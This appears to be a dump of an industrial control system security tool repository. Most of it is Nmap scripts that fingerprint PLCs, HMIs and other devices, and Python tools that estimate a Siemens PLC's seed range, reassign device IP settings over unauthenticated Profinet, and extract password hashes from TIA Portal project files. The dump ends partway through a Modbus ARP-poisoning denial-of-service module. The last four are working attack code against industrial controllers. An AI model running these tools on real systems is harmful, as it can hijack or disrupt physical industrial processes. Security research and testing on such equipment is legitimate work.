= body:match("(.-)") 40 | if version == nil then 41 | version = "Unknown version" 42 | end 43 | output = output .. version 44 | return true 45 | elseif string.find (body, "__FSys_Root") then 46 | version = body:match("(.-)") 47 | version = version:gsub(" ", " ") 48 | if version == nil then 49 | version = "Unknown version" 50 | end 51 | output = output .. version 52 | return true 53 | else 54 | return nil 55 | end 56 | end 57 | 58 | action = function(host, port) 59 | local verified, noun 60 | 61 | local answer1 = http.get(host, port, "/Portal0000.htm" ) 62 | local answer2 = http.get(host, port, "/__Additional" ) 63 | local answer3 = http.get(host, port, "/" ) 64 | 65 | if answer1.status ~= 200 and answer2.status ~= 200 and answer3.status ~= 200 then 66 | return nil 67 | end 68 | 69 | if answer1.status == 200 then 70 | answer = answer1 71 | elseif answer2.status == 200 then 72 | answer = answer2 73 | elseif answer3.status == 200 then 74 | answer = answer3 75 | end 76 | 77 | local v_level = nmap.verbosity() + (nmap.debugging()*2) 78 | local detail = 15 79 | local output = strbuf.new() 80 | 81 | 82 | verified = verify_version(answer.body, output) 83 | 84 | 85 | if verified == nil then 86 | return 87 | end 88 | 89 | -- verbose/debug mode, print 50 entries 90 | if v_level > 1 and v_level < 5 then 91 | detail = 40 92 | -- double debug mode, print everything 93 | elseif v_level >= 5 then 94 | detail = verified 95 | end 96 | 97 | 98 | return output 99 | end -------------------------------------------------------------------------------- /icse-nse/Siemens-HMI-miniweb.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local shortport = require "shortport" 4 | local strbuf = require "strbuf" 5 | 6 | 7 | description = [[ 8 | Checks for SCADA Siemens SIMATIC S7- devices. 9 | 10 | The higher the verbosity or debug level, the more disallowed entries are shown. 11 | ]] 12 | 13 | --- 14 | --@output 15 | -- 80/tcp open http syn-ack 16 | -- |_SIEMENS-HMI-miniweb: Not implemented verify_version 17 | 18 | 19 | 20 | author = "Jose Ramon Palanco, drainware" 21 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 22 | categories = {"default", "discovery", "safe"} 23 | 24 | portrule = shortport.http 25 | local last_len = 0 26 | 27 | 28 | local function verify_version(body, output) 29 | local version = nil 30 | if string.find (body, "ad_header_form_sprachauswahl") then 31 | version = body:match("") 32 | if version == nil then 33 | version = "Not implemented verify_version" 34 | end 35 | output = output .. version 36 | return true 37 | else 38 | return nil 39 | end 40 | end 41 | 42 | action = function(host, port) 43 | local verified, noun 44 | local answer = http.get(host, port, "/CSS/Miniweb.css" ) 45 | 46 | if answer.status ~= 200 then 47 | return nil 48 | end 49 | 50 | local v_level = nmap.verbosity() + (nmap.debugging()*2) 51 | local detail = 15 52 | local output = strbuf.new() 53 | 54 | 55 | verified = verify_version(answer.body, output) 56 | 57 | 58 | if verified == nil then 59 | return 60 | end 61 | 62 | -- verbose/debug mode, print 50 entries 63 | if v_level > 1 and v_level < 5 then 64 | detail = 40 65 | -- double debug mode, print everything 66 | elseif v_level >= 5 then 67 | detail = verified 68 | end 69 | 70 | 71 | return output 72 | end -------------------------------------------------------------------------------- /icse-nse/Siemens-SIMATIC-PLC-S7.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local shortport = require "shortport" 4 | local strbuf = require "strbuf" 5 | 6 | 7 | description = [[ 8 | Checks for SCADA Siemens Simatic S7 devices. 9 | 10 | The higher the verbosity or debug level, the more disallowed entries are shown. 11 | ]] 12 | 13 | --- 14 | --@output 15 | -- 80/tcp open http syn-ack 16 | -- |_Siemens-Simatic-S7: SIMATIC 300 (MPI2)/CPU 315-2 PN/DP 17 | 18 | 19 | 20 | author = "Jose Ramon Palanco, drainware" 21 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 22 | categories = {"default", "discovery", "safe"} 23 | 24 | portrule = shortport.http 25 | local last_len = 0 26 | 27 | 28 | local function verify_version(body, output) 29 | local version = nil 30 | if string.find (body, "/S7Web.css") then 31 | version = body:match("(.-)") 32 | version = version:gsub(" ", " ") 33 | if version == nil then 34 | version = "Unknown version" 35 | end 36 | output = output .. version 37 | return true 38 | elseif string.find (body, "snCplugPresent") then 39 | version = body:match("Siemens, (.-) !!!") 40 | version = version:gsub(" ", " ") 41 | if version == nil then 42 | version = "Unknown version" 43 | end 44 | output = output .. version 45 | return true 46 | 47 | else 48 | return nil 49 | end 50 | end 51 | 52 | action = function(host, port) 53 | local verified, noun 54 | local answer1 = http.get(host, port, "/Portal/Portal.mwsl" ) 55 | local answer2 = http.get(host, port, "/docs/cplugError.html/" ) 56 | 57 | if answer1.status ~= 200 and answer2.status ~= 200 then 58 | return nil 59 | end 60 | 61 | if answer1.status == 200 then 62 | answer = answer1 63 | elseif answer2.status == 200 then 64 | answer = answer2 65 | end 66 | 67 | 68 | local v_level = nmap.verbosity() + (nmap.debugging()*2) 69 | local detail = 15 70 | local output = strbuf.new() 71 | 72 | 73 | verified = verify_version(answer.body, output) 74 | 75 | 76 | if verified == nil then 77 | return 78 | end 79 | 80 | -- verbose/debug mode, print 50 entries 81 | if v_level > 1 and v_level < 5 then 82 | detail = 40 83 | -- double debug mode, print everything 84 | elseif v_level >= 5 then 85 | detail = verified 86 | end 87 | 88 | 89 | return output 90 | end -------------------------------------------------------------------------------- /icse-nse/Siemens-Scalance-module.nse: -------------------------------------------------------------------------------- 1 | local nmap = require "nmap" 2 | local shortport = require "shortport" 3 | local snmp = require "snmp" 4 | local stdnse = require "stdnse" 5 | local table = require "table" 6 | 7 | description = [[ 8 | Checks for SCADA Siemens SCALANCE modules. 9 | 10 | The higher the verbosity or debug level, the more disallowed entries are shown. 11 | ]] 12 | 13 | --- 14 | -- @output 15 | -- | Siemens-Scalance-module: 16 | -- |_ SCALANCE W788-1PRO 17 | 18 | 19 | author = "Jose Ramon Palanco, drainware" 20 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 21 | categories = {"default", "discovery", "safe"} 22 | dependencies = {"snmp-brute"} 23 | 24 | 25 | portrule = shortport.portnumber(161, "udp", {"open", "open|filtered"}) 26 | 27 | 28 | function process_answer( tbl ) 29 | 30 | local new_tab = {} 31 | 32 | for _, v in ipairs( tbl ) do 33 | if string.find (v.value, "SCALANCE") then 34 | version = v.value:gsub("SCALANCE", "VERSION:") 35 | model = version:match("%W+ %s*(.-)%d%d%d") 36 | if model == "W" then 37 | version = version .. " (wireless device)" 38 | elseif model == "X" then 39 | version = version .. " (network switch)" 40 | elseif model == "S" then 41 | version = version .. " (firewall)" 42 | end 43 | else 44 | return nil 45 | end 46 | table.insert( new_tab, version) 47 | end 48 | 49 | table.sort( new_tab ) 50 | 51 | return new_tab 52 | 53 | end 54 | 55 | action = function(host, port) 56 | 57 | local socket = nmap.new_socket() 58 | local catch = function() socket:close() end 59 | local try = nmap.new_try(catch) 60 | local snmpoid = "1.3.6.1.2.1.1.1" 61 | local services = {} 62 | local status 63 | 64 | socket:set_timeout(5000) 65 | try(socket:connect(host, port)) 66 | 67 | status, services = snmp.snmpWalk( socket, snmpoid ) 68 | socket:close() 69 | 70 | 71 | if ( not(status) ) or ( services == nil ) or ( #services == 0 ) then 72 | return 73 | end 74 | 75 | services = process_answer(services) 76 | 77 | if services == nil then 78 | return 79 | end 80 | 81 | nmap.set_port_state(host, port, "open") 82 | 83 | return stdnse.format_output( true, services ) 84 | end 85 | -------------------------------------------------------------------------------- /icse-nse/bradford-networks-nac.nse: -------------------------------------------------------------------------------- 1 | description = [[ 2 | Attempts to detect Bradford Networks Network Sentry appliance admin 3 | web interface. 4 | ]] 5 | 6 | -- @output 7 | -- Nmap scan report for 10.0.0.10 8 | -- Host is up (0.030s latency). 9 | -- PORT STATE SERVICE 10 | -- 8080/tcp open http-proxy 11 | -- |_bradford-networks-nac: Bradford Networks NAC admin interface found! 12 | 13 | 14 | 15 | 16 | author = "John Babio" 17 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 18 | categories = {"default", "safe"} 19 | 20 | local http = require "http" 21 | local shortport = require "shortport" 22 | portrule = shortport.http 23 | 24 | action = function(host, port) 25 | local resp = "Network Sentry Control Server" 26 | 27 | local stat = http.get(host, port, '/') 28 | if stat.status == 200 and http.response_contains(stat, resp) then 29 | return "Bradford Networks NAC admin interface found!" 30 | end 31 | end -------------------------------------------------------------------------------- /icse-nse/cr3-fingerprint.nse: -------------------------------------------------------------------------------- 1 | description = "Fingerprints Red Lion HMI devices" 2 | author = "Thought Leader" 3 | email_address = "thoughtleader@internetofallthethings.com" 4 | license = "TO-ILL" 5 | categories = {"version","discovery"} 6 | 7 | stdnse = require "stdnse" 8 | 9 | -- Perform discovery using Red Lion Crimson V3 Protocol 10 | 11 | -- this method should expose a user configuration 12 | portrule = function(host, port) 13 | return port.number == 789 14 | end 15 | 16 | action = function(host, port) 17 | local client = nmap.new_socket() 18 | local catch = function() 19 | client:close() 20 | end 21 | 22 | local try = nmap.new_try(catch) 23 | 24 | -- first fingerprint gets the manufacturer info 25 | try(client:connect(host.ip, 789)) 26 | 27 | local localip, loaclport, remoteip, remoteport = 28 | try(client:get_info()) 29 | 30 | local probe_manufacturer = string.char(0x00,0x04,0x01,0x2b,0x1b,0x00) 31 | try(client:send(probe_manufacturer)) 32 | resp = try(client:receive()) 33 | 34 | if string.len(resp) > 2 then 35 | -- return the result, skipping the CR3 header and omitting the trailing null 36 | resp_string = "\nManufacturer: " .. string.sub(resp, 7, -2) 37 | end 38 | 39 | try(client:close()) 40 | 41 | -- second fingerprint gets the model information 42 | try(client:connect(host.ip, 789)) 43 | 44 | local localip, loaclport, remoteip, remoteport = 45 | try(client:get_info()) 46 | 47 | local probe_manufacturer = string.char(0x00,0x04,0x01,0x2a,0x1a,0x00) 48 | try(client:send(probe_manufacturer)) 49 | resp = try(client:receive()) 50 | 51 | if string.len(resp) > 2 then 52 | -- return the result, skipping the CR3 header and omitting the trailing null 53 | resp_string = resp_string .. "\nModel: " .. string.sub(resp, 7, -2) .. "\n" 54 | end 55 | 56 | try(client:close()) 57 | 58 | return resp_string 59 | 60 | end 61 | -------------------------------------------------------------------------------- /icse-nse/cspv4-info.nse: -------------------------------------------------------------------------------- 1 | local bin = require "bin" 2 | local nmap = require "nmap" 3 | local shortport = require "shortport" 4 | local stdnse = require "stdnse" 5 | local string = require "string" 6 | local table = require "table" 7 | 8 | description = [[ 9 | This NSE script is used to send a CSPV4 packet to a remote device that has TCP 2222 open. This is a port used via CIP 10 | and used by CSPV4 on AB PLC5 systems. This will determine the Session ID of the remote device to verify it as a CSPV4 11 | compliant device. CSPV4 or AB/Ethernet is used by Allen Bradley inside of its software products such as RSLinx to 12 | communicate to the PLCs. This will help ideitify some Allen Bradley PLCs that do not communicate via Ethernet/IP. 13 | Example: PLC5, SLC 500 14 | 15 | ]] 16 | --- 17 | -- @usage 18 | -- nmap --script cspv4-info -p 2222 19 | -- 20 | -- 21 | -- @output 22 | --PORT STATE SERVICE 23 | --2222/tcp open CSPV4 24 | --| cspv4-info: 25 | --|_ Session ID: 65792 26 | 27 | author = "Stephen Hilt" 28 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 29 | categories = {"discovery", "intrusive"} 30 | 31 | -- 32 | -- Function to define the portrule as per nmap standards 33 | -- 34 | -- 35 | -- 36 | portrule = shortport.portnumber(2222, "tcp") 37 | 38 | --- 39 | -- Function to set the nmap output for the host, if a valid CSPV4 packet 40 | -- is received then the output will show that the port as CSPV4 instead of 41 | -- unknown 42 | -- 43 | -- @param host Host that was passed in via nmap 44 | -- @param port port that CSPV4 is running on (Default TCP/2222) 45 | function set_nmap(host, port) 46 | 47 | --set port Open 48 | port.state = "open" 49 | -- set version name to cspv4 50 | port.version.name = "CSPV4" 51 | nmap.set_port_version(host, port) 52 | nmap.set_port_state(host, port, "open") 53 | 54 | end 55 | --- 56 | -- Action Function that is used to run the NSE. 57 | -- 58 | -- @param host Host that was scanned via nmap 59 | -- @param port port that was scanned via nmap 60 | action = function(host,port) 61 | -- pack the inital communications to the PLC5 62 | local init_coms = bin.pack("H","01010000000000000000000000040005000000000000000000000000") 63 | -- create table for output 64 | local output = stdnse.output_table() 65 | -- create local vars for socket handling 66 | local socket, try, catch 67 | -- create new socket 68 | socket = nmap.new_socket() 69 | -- define the catch of the try statement 70 | catch = function() 71 | socket:close() 72 | end 73 | -- create new try 74 | try = nmap.new_try(catch) 75 | 76 | -- connect to port on host 77 | try(socket:connect(host, port)) 78 | -- send Req Identity packet 79 | try(socket:send(init_coms)) 80 | -- receive response 81 | local rcvstatus, response = socket:receive() 82 | if(rcvstatus == false) then 83 | return false, response 84 | end 85 | -- unpack the response first byte 86 | local pos, first_check = bin.unpack("C", response, 1) 87 | -- Validate the response is the response we expected 88 | if(first_check == 0x02) then 89 | -- store Session ID in output table 90 | pos, output["Session ID"] = bin.unpack("i", response, 5) 91 | -- set Nmap output 92 | set_nmap(host, port) 93 | -- close socket 94 | socket:close() 95 | -- return output table to Nmap 96 | return output 97 | -- If response is not what expcted then close connection and return nothing 98 | else 99 | socket:close() 100 | return nil 101 | end 102 | end 103 | -------------------------------------------------------------------------------- /icse-nse/melsecq-discover-udp.nse: -------------------------------------------------------------------------------- 1 | -- Nmap Scripting Engine 2 | -- required packages for this script 3 | -- 4 | -- ICS Security Workspace(plcscan.org) 5 | -- ICS Discovery Tools Releases 6 | --- 7 | 8 | local bin = require "bin" 9 | local nmap = require "nmap" 10 | local shortport = require "shortport" 11 | local stdnse = require "stdnse" 12 | local string = require "string" 13 | local table = require "table" 14 | 15 | --Usage: 16 | --Identify MELSEC-Q Series PLC CPUINFO 17 | --nmap -script melsecq-discover-udp.nse -sU -p 5006 18 | 19 | --Output Example: 20 | --PORT STATE SERVICE REASON 21 | --5006/udp open Mitsubishi/Melsoft udp syn-ack 22 | --| melsecq-discover: 23 | --|_ CPUINFO: Q03UDECPU 24 | 25 | 26 | description = [[ 27 | discovery Mitsubishi Electric Q Series PLC 28 | GET CPUINFO 29 | ]] 30 | 31 | 32 | author = "ICS Security Workspace(plcscan.org)" 33 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 34 | categories = {"discovery","intrusive"} 35 | 36 | function set_nmap(host, port) 37 | port.state = "open" 38 | port.version.name = "MelsoftUdp" 39 | port.version.product = "Mitsubishi Q PLC" 40 | nmap.set_port_version(host, port) 41 | nmap.set_port_state(host, port, "open") 42 | 43 | end 44 | 45 | function send_receive(socket, query) 46 | local sendstatus, senderr = socket:send(query) 47 | if(sendstatus == false) then 48 | return "Error Sending getcpuinfopack" 49 | end 50 | local rcvstatus,response = socket:receive() 51 | if(rcvstatus == false) then 52 | return "Error Reading getcpuinfopack" 53 | end 54 | return response 55 | end 56 | 57 | portrule = shortport.port_or_service(5006, "MelsoftUdp", "udp") 58 | action = function(host,port) 59 | local getcpuinfopack = bin.pack("H","57000000001111070000ffff030000fe03000014001c080a080000000000000004" .. "0101" .. "010000000001") 60 | local response 61 | local output = stdnse.output_table() 62 | local sock = nmap.new_socket() 63 | local constatus,conerr = sock:connect(host,port) 64 | if not constatus then 65 | stdnse.print_debug(1, 66 | 'Error establishing connection for %s - %s', host,conerr 67 | ) 68 | return nil 69 | end 70 | response = send_receive(sock, getcpuinfopack) 71 | local mel, pack_head = bin.unpack("C", response, 1) 72 | -- local mel, space_id = bin.unpack("C", response, 55) 73 | local offset = 0 74 | if ( pack_head == 0xd7) then 75 | -- if ( space_id == 0x20) then 76 | local mel 77 | local mel, cpuinfo = bin.unpack("z", response, 42 + offset) 78 | output["CPUINFO"] = string.sub(cpuinfo, 1, 16) 79 | set_nmap(host, port) 80 | sock:close() 81 | return output 82 | -- end 83 | else 84 | sock:close() 85 | return nil 86 | 87 | end 88 | 89 | 90 | end -------------------------------------------------------------------------------- /icse-nse/melsecq-discover.nse: -------------------------------------------------------------------------------- 1 | -- Nmap Scripting Engine 2 | -- required packages for this script 3 | -- 4 | -- ICS Security Workspace(plcscan.org) 5 | -- ICS Discovery Tools Releases 6 | --- 7 | 8 | local bin = require "bin" 9 | local nmap = require "nmap" 10 | local shortport = require "shortport" 11 | local stdnse = require "stdnse" 12 | local string = require "string" 13 | local table = require "table" 14 | 15 | --Usage: 16 | --Identify MELSEC-Q Series PLC CPUINFO 17 | --nmap -script melsecq-discover -sT -p 5007 18 | 19 | 20 | --Output Example: 21 | --PORT STATE SERVICE REASON 22 | --5007/tcp open MelsoftTCP syn-ack 23 | --| melsecq-discover: 24 | --|_ CPUINFO: Q03UDECPU 25 | 26 | 27 | description = [[ 28 | discovery Mitsubishi Electric Q Series PLC 29 | GET CPUINFO 30 | ]] 31 | 32 | author = "ICS Security Workspace(plcscan.org)" 33 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 34 | categories = {"discovery","intrusive"} 35 | 36 | function set_nmap(host, port) 37 | port.state = "open" 38 | port.version.name = "MelsoftTCP" 39 | port.version.product = "Mitsubishi Q PLC" 40 | nmap.set_port_version(host, port) 41 | nmap.set_port_state(host, port, "open") 42 | 43 | end 44 | 45 | function send_receive(socket, query) 46 | local sendstatus, senderr = socket:send(query) 47 | if(sendstatus == false) then 48 | return "Error Sending getcpuinfopack" 49 | end 50 | local rcvstatus,response = socket:receive() 51 | if(rcvstatus == false) then 52 | return "Error Reading getcpuinfopack" 53 | end 54 | return response 55 | end 56 | 57 | portrule = shortport.port_or_service(5007, "MelsoftTCP", "tcp") 58 | action = function(host,port) 59 | local getcpuinfopack = bin.pack("H","57000000001111070000ffff030000fe03000014001c080a080000000000000004" .. "0101" .. "010000000001") 60 | local response 61 | local output = stdnse.output_table() 62 | local sock = nmap.new_socket() 63 | local constatus,conerr = sock:connect(host,port) 64 | if not constatus then 65 | stdnse.print_debug(1, 66 | 'Error establishing connection for %s - %s', host,conerr 67 | ) 68 | return nil 69 | end 70 | response = send_receive(sock, getcpuinfopack) 71 | local mel, pack_head = bin.unpack("C", response, 1) 72 | -- local mel, space_id = bin.unpack("C", response, 55) 73 | local offset = 0 74 | if ( pack_head == 0xd7) then 75 | -- if ( space_id == 0x20) then 76 | local mel 77 | local mel, cpuinfo = bin.unpack("z", response, 42 + offset) 78 | output["CPUINFO"] = string.sub(cpuinfo, 1, 16) 79 | set_nmap(host, port) 80 | sock:close() 81 | return output 82 | -- end 83 | else 84 | sock:close() 85 | return nil 86 | 87 | end 88 | 89 | 90 | end -------------------------------------------------------------------------------- /icse-nse/minecraft.nse: -------------------------------------------------------------------------------- 1 | -- Minecraft Server Probe 2 | 3 | description = [[ 4 | Checks for Minecraft Servers using the 0x02 "Handshake" protocol 5 | ]] 6 | 7 | --- 8 | -- @output 9 | -- Host script results: 10 | -- |_ minecraft: Minecraft Server! 11 | 12 | author = "cbock" 13 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 14 | categories = {"safe"} 15 | 16 | require "stdnse" 17 | require "shortport" 18 | 19 | portrule = shortport.port_or_service(25565, "minecraft") 20 | 21 | action = function(host, port) 22 | 23 | local socket, result, try, catch, status 24 | result="" 25 | status=true 26 | socket = nmap.new_socket() 27 | socket:set_timeout(1000) 28 | catch = function() 29 | socket:close() 30 | end 31 | 32 | try=nmap.new_try(catch) 33 | try(socket:connect(host, port)) 34 | try(socket:send("\002\000\001\0000")) 35 | status, result = socket:receive_bytes(16); 36 | 37 | if (not status) then 38 | socket:close() 39 | return "Not a Minecraft Server" 40 | end 41 | 42 | if (result == "TIMEOUT") then 43 | socket:close() 44 | return "Not a Minecraft Server" 45 | end 46 | 47 | socket:close() 48 | return "Minecraft Server!", result 49 | 50 | end 51 | 52 | -------------------------------------------------------------------------------- /qModMaster-code-0.4.7.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/qModMaster-code-0.4.7.zip -------------------------------------------------------------------------------- /scada-tools/get_seed_range.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*-mode: python; coding: UTF-8 -*- 3 | 4 | import sys 5 | import socket 6 | import urllib 7 | import re 8 | import time 9 | import calendar 10 | 11 | #plc_ip = '10.0.70.155' 12 | #plc_ver = 1200 13 | 14 | plc_ip = '10.0.170.140' 15 | plc_ver = 1500 16 | 17 | time_gerex_1200 = re.compile(r'
.*[0-9]{4}', re.IGNORECASE) 18 | 19 | time_gerex_1500_time = re.compile(r'([0-9]{2}:[0-9]{2}:[0-9]{2}) (am|pm)', re.IGNORECASE) 20 | time_gerex_1500_date = re.compile(r'[0-9]{2}/[0-9]{2}/[0-9]{4}', re.IGNORECASE) 21 | 22 | def get_uptime_timeticks(): 23 | sysuptime_payload = '\x30\x27\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x1a\x02\x02\x6f\x0c\x02\x01\x00\x02\x01\x00\x30\x0e\x30\x0c\x06\x08\x2b\x06\x01\x02\x01\x01\x03\x00\x05\x00' 24 | sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM) 25 | sock.sendto(sysuptime_payload, (plc_ip, 161)) 26 | data, addr = sock.recvfrom(1024) 27 | data = data.encode('hex') 28 | t = data.split('2b06010201010300')[1] # split by object Name 29 | timeticks_len = int(t[2:4], 16) 30 | timeticks = int(data[-timeticks_len*2:], 16) 31 | return timeticks 32 | 33 | def get_current_time_epoch(): 34 | data = urllib.urlopen("http://{0}/Portal/Portal.mwsl?intro_enter_button=ENTER&PriNav=Start&coming_from_intro=true".format(plc_ip)).read() 35 | if plc_ver==1200: 36 | curr_time = time_gerex_1200.findall(data)[0].split('>')[1].replace('   ', ' ') 37 | curr_time_struct = time.strptime(curr_time, "%I:%M:%S %p %d.%m.%Y") 38 | curr_time_epoch = int(calendar.timegm(curr_time_struct)) 39 | else: 40 | tmatch = time_gerex_1500_time.search(data) 41 | ctime = tmatch.group(0) 42 | dmatch = time_gerex_1500_date.search(data) 43 | cdate = dmatch.group(0) 44 | curr_time = '%s %s' % (ctime, cdate) 45 | curr_time_struct = time.strptime(curr_time, "%I:%M:%S %p %m/%d/%Y") 46 | curr_time_epoch = int(calendar.timegm(curr_time_struct)) 47 | 48 | return curr_time_epoch 49 | 50 | if __name__ == '__main__': 51 | 52 | timeticks = get_uptime_timeticks() 53 | curr_time_epoch = get_current_time_epoch() 54 | 55 | print "timeticks:", timeticks 56 | print "current time epoch:", curr_time_epoch 57 | 58 | plc_start_epoch = int( (curr_time_epoch - timeticks/100) & 0xFFFF ) 59 | seed_range = (plc_start_epoch + 320, plc_start_epoch + 320 + 100) 60 | print "seed range:", seed_range 61 | -------------------------------------------------------------------------------- /scada-tools/profinet_set_network_info.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | File: profinet_set_network_info.py 5 | Desc: Set network info: ip, mask, gateway through Profinet DCP request 6 | """ 7 | 8 | __author__ = "Aleksandr Timorin" 9 | __copyright__ = "Copyright 2014, Positive Technologies" 10 | __license__ = "GNU GPL v3" 11 | __version__ = "0.1" 12 | __maintainer__ = "Aleksandr Timorin" 13 | __email__ = "atimorin@gmail.com" 14 | __status__ = "Development" 15 | 16 | 17 | import sys 18 | import socket 19 | import optparse 20 | 21 | if __name__ == '__main__': 22 | 23 | 24 | parser = optparse.OptionParser() 25 | parser.add_option('-i', dest="src_iface", default="", help="source network interface") 26 | parser.add_option('--smac', dest="src_mac", default="", help="source mac address: 000102030405") 27 | parser.add_option('--dmac', dest="dst_mac", default="", help="destination mac address: aabbccddeeff") 28 | parser.add_option('--ip', dest="pf_ip", default="", help="ip address: 192.168.0.100") 29 | parser.add_option('--mask', dest="pf_mask", default="", help="network mask: 255.255.255.0") 30 | parser.add_option('--gw', dest="pf_gw", default="", help="default gateway: 192.168.0.1") 31 | options, args = parser.parse_args() 32 | parser.print_help() 33 | 34 | src_iface = options.src_iface or 'eth0' 35 | src_mac = options.src_mac 36 | dst_mac = options.dst_mac 37 | 38 | pf_ip = options.pf_ip 39 | pf_mask = options.pf_mask 40 | pf_gw = options.pf_gw 41 | 42 | raw_input("press any key to continue...") 43 | 44 | profinet_dcp_ethernet_frame = { 45 | 'dst_mac' : dst_mac.decode('hex'), 46 | 'src_mac' : src_mac.decode('hex'), 47 | 'proto' : '\x88\x92', 48 | 'payload' : '\xfe\xfd\x04\x00\x04\x00\x00\x01\x00\x00\x00\x12\x01\x02\x00\x0e\x00\x00' + socket.inet_aton(pf_ip) + socket.inet_aton(pf_mask) + socket.inet_aton(pf_gw), 49 | } 50 | 51 | pdef = profinet_dcp_ethernet_frame 52 | eth_sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 0x8892) 53 | # set socket recieve timeout 2 seconds 54 | # eth_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, struct.pack('ii', int(2), 0)) 55 | 56 | eth_sock.bind((src_iface, 0x8892)) 57 | data = pdef['dst_mac'] + pdef['src_mac'] + pdef['proto'] + pdef['payload'] 58 | eth_sock.send(data) 59 | 60 | recieved_packets = [] 61 | 62 | while True: 63 | try: 64 | buf = eth_sock.recv(1024) 65 | print 'recieved: %r' % buf 66 | if buf: 67 | recieved_packets.append(buf) 68 | else: 69 | break 70 | except: 71 | break 72 | 73 | eth_sock.close() 74 | 75 | -------------------------------------------------------------------------------- /scada-tools/s7_password_hashes_extractor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | File: s7_password_hashes_extractor.py 5 | Desc: password hashes extractor from Siemens Simatic TIA Portal project file 6 | """ 7 | 8 | __author__ = "Aleksandr Timorin" 9 | __copyright__ = "Copyright 2013, Positive Technologies" 10 | __license__ = "GNU GPL v3" 11 | __version__ = "1.1" 12 | __maintainer__ = "Aleksandr Timorin" 13 | __email__ = "atimorin@gmail.com" 14 | __status__ = "Development" 15 | 16 | import sys 17 | import os 18 | import re 19 | import optparse 20 | from binascii import hexlify 21 | from hashlib import sha1 22 | 23 | cfg_result_hashes = 's7_password_hashes_extractor.hashes' 24 | 25 | if __name__ == '__main__': 26 | parser = optparse.OptionParser() 27 | parser.add_option('-p', dest="project_file", help="PEData.plf filepath") 28 | options, args = parser.parse_args() 29 | 30 | if not options.project_file: 31 | parser.print_help() 32 | sys.exit() 33 | 34 | data = open(options.project_file, 'rb').read() 35 | print "read PEData file %s, size 0x%X bytes" % (options.project_file, os.path.getsize(options.project_file)) 36 | 37 | print "sample of used passwords and hashes:" 38 | for p in ['123', '1234AaBb', '1234AaB', '1111111111aaaaaaaaaa']: 39 | print "\t%s : %s" % (p, sha1(p).hexdigest()) 40 | 41 | re_pattern = re.compile('456e6372797074656450617373776f72[a-f0-9]{240,360}000101000000[a-f0-9]{40}') 42 | possible_hashes = [s[-40:] for s in re_pattern.findall(hexlify(data))] 43 | possible_hashes = reduce(lambda x, y: x if y in x else x + [y], possible_hashes, []) 44 | open(cfg_result_hashes, 'w').write('\n'.join(possible_hashes)) 45 | 46 | total_hashes = len(possible_hashes) 47 | print "found %d sha1 hashes, ordered by histrory list:" % (total_hashes) 48 | for h in possible_hashes: 49 | pos = possible_hashes.index(h) + 1 50 | if pos == total_hashes: 51 | print '\thash %d: %s\t(current)' % (pos, h) 52 | else: 53 | print '\thash %d: %s' % (pos, h) 54 | -------------------------------------------------------------------------------- /scadapass.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/scadapass.csv -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/arp.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import signal 4 | import threading 5 | import random 6 | 7 | from System.Core.Global import * 8 | from System.Core.Colors import * 9 | from System.Core.Modbus import * 10 | from System.Lib import ipcalc 11 | 12 | 13 | 14 | down = False 15 | class Module: 16 | 17 | 18 | info = { 19 | 'Name': 'DOS Arp Poisoning', 20 | 'Author': ['@enddo'], 21 | 'Description': ("DOS with Arp Poisoning"), 22 | 23 | } 24 | options = { 25 | 'Master' :['' ,True ,'The master IP address'], 26 | 'Slave' :['' ,True ,'The slave IP address'], 27 | 'Output' :[False ,False ,'The stdout save in output directory'] 28 | } 29 | output = '' 30 | 31 | def exploit(self): 32 | 33 | moduleName = self.info['Name'] 34 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 35 | self.do() 36 | if(self.options['Output'][0]): 37 | open(mainPath + '/Output/' + moduleName + '_' + self.options['Master'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 38 | self.output = '' 39 | 40 | def printLine(self,str,color): 41 | self.output += str + '\n' 42 | if(str.find('[+]') != -1): 43 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 44 | elif(str.find('[-]') != -1): 45 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 46 | else: 47 | print str 48 | 49 | def do(self): 50 | def poison_target(gatway_ip,gatway_mac,target_ip,target_mac): 51 | self.printLine('[+] Start Poisoning',bcolors.OKGREEN) 52 | with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf: 53 | ipf.write('1\n') 54 | while True: 55 | try: 56 | send(ARP(op=2,psrc=gatway_ip,pdst=target_ip,hwdst=target_mac,hwsrc=RandMAC())) 57 | send(ARP(op=2,psrc=target_ip,pdst=gatway_ip,hwdst=gatway_mac,hwsrc=RandMAC())) 58 | time.sleep(4) 59 | except: 60 | sys.exit(0) 61 | def get_mac(ip_address): 62 | ans,unasn = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10) 63 | ans.res 64 | return ans.res[0][1][Ether].src 65 | 66 | 67 | 68 | target_ip = self.options['Slave'][0] 69 | gatway_ip = self.options['Master'][0] 70 | 71 | 72 | gatway_mac = get_mac(gatway_ip) 73 | if(gatway_mac == 